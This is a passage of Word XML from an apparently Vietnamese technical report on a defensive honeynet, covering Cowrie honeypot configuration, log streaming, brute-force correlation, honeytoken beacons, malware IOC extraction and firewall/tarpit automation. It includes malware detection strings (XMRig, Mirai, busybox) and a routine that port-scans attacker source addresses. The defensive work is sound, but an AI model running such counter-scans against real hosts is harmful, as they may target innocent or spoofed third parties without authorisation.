                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Kiến trúc Honeynet Phân tán cho phép hệ thống mở rộng từ mô hình bẫy mồi phòng thí nghiệm đơn lẻ thành mạng lưới cảm biến đan xen (Sensor Mesh) cấp doanh nghiệp. Điểm đột phá kỹ thuật nằm ở cơ chế tương quan Cross-Subnet: Kẻ tấn công cho dù sử dụng kỹ thuật trinh sát phân tán chậm (Slow-and-Low Scan) để lẩn tránh IDS/IPS truyền thống vẫn sẽ bị vạch trần ngay khi chạm vào 2 bẫy mồi ở các phân vùng mạng khác nhau.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F6">
      <w:pPr>
        <w:spacing w:after="80" w:before="4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F7">
      <w:pPr>
        <w:keepNext w:val="1"/>
        <w:spacing w:before="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="003366"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CHƯƠNG 4: HIỆN THỰC HÓA VÀ MÃ NGUỒN CÁC PHÂN HỆ</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F8">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4.1 Môi trường Triển khai và Cấu hình Tùy biến Cowrie Honeypot</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F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Hệ thống được triển khai trên nền tảng máy chủ Linux Ubuntu Server 22.04 LTS (64-bit). Nhằm biến Cowrie từ một máy bẫy mặc định dễ bị phát hiện thành một máy chủ sản xuất thực tế (Realistic Production Server), các cấu hình tùy biến chuyên sâu đã được thực hiện:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F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Chuyển dịch Cổng Dịch vụ (Port Redirection): Cổng SSH thực tế dùng để quản trị máy chủ được đổi từ cổng 22 sang cổng bí mật 54322. Cổng mặc định 22 của hệ thống được chuyển hướng (NAT Port Forwarding) về cổng 2222 của Cowrie Honeypot bằng lệnh iptables:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table11"/>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1FB">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iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2222</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001FC">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Lệnh iptables chuyển hướng lưu lượng SSH từ cổng 22 sang cổng bẫy 2222</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F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Cấu hình Tùy biến File 'cowrie.cfg': Thay đổi Hostname mặc định từ 'svr04' thành 'corp-db-master-01' và giả lập phiên bản OpenSSH chuẩn của Ubuntu (OpenSSH_8.9p1 Ubuntu-3ubuntu0.4) nhằm đánh lừa các công cụ quét chuyên nghiệp như Nmap OS detection:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table12"/>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1FE">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[honeypot]</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">hostname = corp-db-master-01</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">log_path = var/log/cowrie</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">download_path = var/lib/cowrie/downloads</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">contents_path = share/cowrie/contents</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">txtcmds_path = share/cowrie/txtcmds</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">[ssh]</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">enabled = true</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">listen_endpoints = tcp:2222:interface=0.0.0.0</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">version = SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.4</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">[output_json]</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">enabled = true</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">logfile = var/log/cowrie/cowrie.json</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001FF">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Trích đoạn cấu hình tùy biến máy bẫy trong tệp tin cowrie.cfg</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000200">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4.2 Chi tiết Mã nguồn Phân hệ Thu thập Log Streaming (cowrie_listener.py)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020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Phân hệ 'CowrieLogListener' được hiện thực hóa với lớp đối tượng chuyên trách theo dõi sự thay đổi của tệp tin log 'cowrie.json'. Khi phát hiện có dòng dữ liệu mới, module lập tức chuyển đổi chuỗi JSON thành dictionary và gọi hàm callback bất đồng bộ:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table13"/>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02">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class CowrieLogListener:</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    def __init__(self, log_file_path: str, poll_interval: float = 0.5):</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        self.log_file_path = log_file_path</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        self.poll_interval = poll_interval</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        self._running = False</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        self._last_position = 0</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    def start(self, callback: Callable[[dict], None]) -&gt; None:</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        self._running = True</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        with open(self.log_file_path, "r", encoding="utf-8") as f:</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">            f.seek(0, os.SEEK_END) # Nhảy tới cuối tệp để đón log mới</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">            while self._running:</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">                line = f.readline()</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">                if not line:</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">                    time.sleep(self.poll_interval)</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">                    continue</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">                try:</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">                    event = json.loads(line.strip())</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">                    callback(event)</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">                except json.JSONDecodeError:</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">                    continue</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000203">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Hiện thực hóa cơ chế Streaming Log Parser trong core/cowrie_listener.py</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000204">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4.3 Chi tiết Mã nguồn Động cơ Tương quan Sự kiện (correlation_engine.py)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020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Lớp 'EventCorrelationEngine' cài đặt cấu trúc dữ liệu ThreatAlert cùng thuật toán Cửa sổ Thời gian Trượt. Module quản lý bộ đếm các lần đăng nhập thất bại theo từng IP nguồn và kiểm tra thời gian tồn tại trong danh sách để phát hiện tấn công brute-force chuẩn xác:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table14"/>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06">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 Xử lý phát hiện Brute Force T1110.001</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">if eventid == "cowrie.login.failed":</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    self.failed_logins[src_ip] = [</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        t for t in self.failed_logins[src_ip] if now - t &lt;= self.window_seconds</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    ]</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    self.failed_logins[src_ip].append(now)</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    if len(self.failed_logins[src_ip]) &gt;= self.brute_force_threshold:</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        count = len(self.failed_logins[src_ip])</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        self.failed_logins[src_ip].clear()</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        return ThreatAlert(</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">            alert_id=f"ALT-BRUTE-{int(now)}",</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">            rule_name="Dò quét mật khẩu diện rộng (SSH Brute Force Attack)",</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">            mitre_technique_id="T1110.001",</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">            mitre_technique_name="Brute Force: Password Guessing",</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">            severity="HIGH",</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">            source_ip=src_ip,</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">            timestamp=timestamp,</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">            details={"failed_attempts": count, "target_user": username},</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">            recommended_action="tarpit_and_block",</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        )</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000207">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Đoạn mã thuật toán cửa sổ trượt trong core/correlation_engine.py</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000208">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4.4 Chi tiết Mã nguồn Phân hệ Trinh sát ngược Kẻ tấn công (reverse_intel.py)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020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Lớp 'ReverseIntelligenceEngine' tổng hợp các hàm trinh sát đa nguồn: 'lookup_geoip', 'lookup_abuseipdb', 'lookup_shodan' và 'safe_reverse_port_scan'. Hàm quét cổng ngược sử dụng socket TCP với thời gian chờ 300ms, kết hợp hàm '_classify_threat' để suy luận hình thái đối thủ:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table15"/>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0A">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def safe_reverse_port_scan(self, ip: str, ports: Optional[List[int]] = None) -&gt; List[int]:</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    if ports is None:</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        ports = [21, 22, 23, 80, 443, 1080, 3128, 3389, 8080, 8888]</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    open_ports = []</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    for port in ports:</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        s.settimeout(0.3)</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        try:</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">            if s.connect_ex((ip, port)) == 0:</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">                open_ports.append(port)</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        except Exception:</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">            pass</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        finally:</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">            s.close()</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    return open_ports</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020B">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Hiện thực hóa quét cổng ngược an toàn trong core/reverse_intel.py</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020C">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4.5 Chi tiết Mã nguồn Bẫy mồi Honeytoken &amp; Khử ẩn danh (honeytoken_manager.py)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020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Lớp 'HoneytokenManager' tự động sinh các tệp tin giả lập nhạy cảm có gắn mã nhận dạng duy nhất (UUID Canary Tokens). Khi kẻ tấn công kích hoạt Webhook, hàm 'process_beacon_callback' bóc tách các trường HTTP Header để lấy IP thật của kẻ tấn công:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table16"/>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0E">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def process_beacon_callback(self, token_id: str, request_headers: Dict, real_ip: str) -&gt; Dict:</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    token_info = self.active_tokens.get(token_id, {})</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    token_info["status"] = "TRIGGERED"</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    token_info["trigger_ip"] = real_ip</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    token_info["user_agent"] = request_headers.get("User-Agent", "Unknown")</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    return {</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        "alert": "HONEYTOKEN_TRIGGERED",</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        "severity": "CRITICAL",</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        "message": f"Kẻ tấn công đã mang tài liệu bẫy ({token_info.get('type')}) về máy thật để mở!",</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        "attacker_real_ip": real_ip,</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        "attacker_fingerprint": request_headers.get("User-Agent"),</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        "token_details": token_info,</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020F">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Hiện thực hóa cơ chế khử ẩn danh kẻ tấn công trong core/honeytoken_manager.py</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000210">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4.6 Chi tiết Mã nguồn Phân tích Mã độc &amp; Tra cứu VirusTotal (payload_analyzer.py)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021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Phân hệ 'PayloadAnalyzer' sử dụng thư viện hashlib để tính toán mã băm SHA256 và MD5, đồng thời sử dụng biểu thức chính quy (Regex) quét qua chuỗi nhị phân để trích xuất địa chỉ IP C2 và URL máy chủ tải mã độc giai đoạn 2:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table17"/>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12">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def _extract_static_iocs(self, content: bytes) -&gt; Dict[str, List[str]]:</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    text = content.decode("utf-8", errors="ignore")</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    ip_pattern = r"\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b"</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    url_pattern = r"https?://(?:[-\w.]|(?:%[\da-fA-F]{2}))+[^\s]*"</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    </w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    ips = list(set(re.findall(ip_pattern, text)))</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    urls = list(set(re.findall(url_pattern, text)))</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    signatures = []</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    if "xmrig" in text.lower():</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        signatures.append("Cryptocurrency Miner (XMRig / Monero)")</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    if "/bin/busybox" in text or "dvrHelper" in text or "mirai" in text.lower():</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        signatures.append("IoT Botnet Variant (Mirai / Gafgyt)")</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    return {"ips": ips, "urls": urls, "signatures": signatures}</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000213">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Trích xuất IOCs tĩnh và chữ ký mã độc trong core/payload_analyzer.py</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000214">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4.7 Chi tiết Mã nguồn Động cơ SOAR Thực thi Phản ứng (soar_enforcer.py)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021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Lớp 'SOAREnforcer' quản lý việc chặn IP trên Tường lửa và điều hướng kết nối vào Tarpit. Module hỗ trợ kiểm tra danh sách trắng (Whitelist) để chống tự khóa nhầm máy quản trị viên và tự động xuất bản Threat Feed:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table18"/>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16">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def block_ip(self, ip: str, duration_sec: int = 3600, reason: str = "Brute Force") -&gt; Dict:</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    if ip in self.whitelist:</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        return {"status": "skipped", "message": "IP nằm trong Whitelist an toàn"}</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    if "linux" in self.os_type:</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        subprocess.run(["iptables", "-I", "INPUT", "-s", ip, "-j", "DROP"], check=True)</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    self.blocked_ips[ip] = time.time() + duration_sec</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    self._append_to_ioc_feed(ip, reason)</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    return {"status": "success", "action": "FIREWALL_BLOCK", "ip": ip}</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">def tarpit_ip(self, ip: str) -&gt; Dict:</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    if "linux" in self.os_type:</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        cmd = f"iptables -t nat -A PREROUTING -p tcp -s {ip} --dport 2222 -j REDIRECT --to-ports 22222"</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        subprocess.run(cmd.split(), capture_output=True)</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    return {"status": "success", "action": "TARPIT_RESOURCE_EXHAUSTION", "ip": ip}</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000217">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Hiện thực hóa cơ chế chặn Firewall và Tarpit trong core/soar_enforcer.py</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000218">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4.8 Chi tiết Mã nguồn Telegram SOAR Bot tương tác 2 chiều (telegram_soar_bot.py)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
